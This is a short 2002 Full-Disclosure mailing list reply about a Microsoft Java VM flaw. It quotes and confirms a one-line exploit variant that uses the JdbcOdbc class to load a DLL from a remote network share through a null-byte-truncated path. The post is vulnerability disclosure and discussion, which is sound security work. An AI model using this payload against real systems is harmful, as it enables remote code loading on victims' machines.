On Mon, 23 Sep 2002, Georgi Guninski wrote:
> Does
> new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
> work?
Yes, seems to work, so there's another way to exploit this one. It
requires that browsing internet shares works, which may limit the systems
where it can be exploited. Although there were other Java vulnerabilities
involving the use of shares, I never came to think about this way. MS may
have thought of this, but of course they don't mention this kind of
things during the "co-operation".
--
Jouko Pynnonen Online Solutions Ltd Secure your Linux -
[EMAIL PROTECTED] http://www.solutions.fi http://www.secmod.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
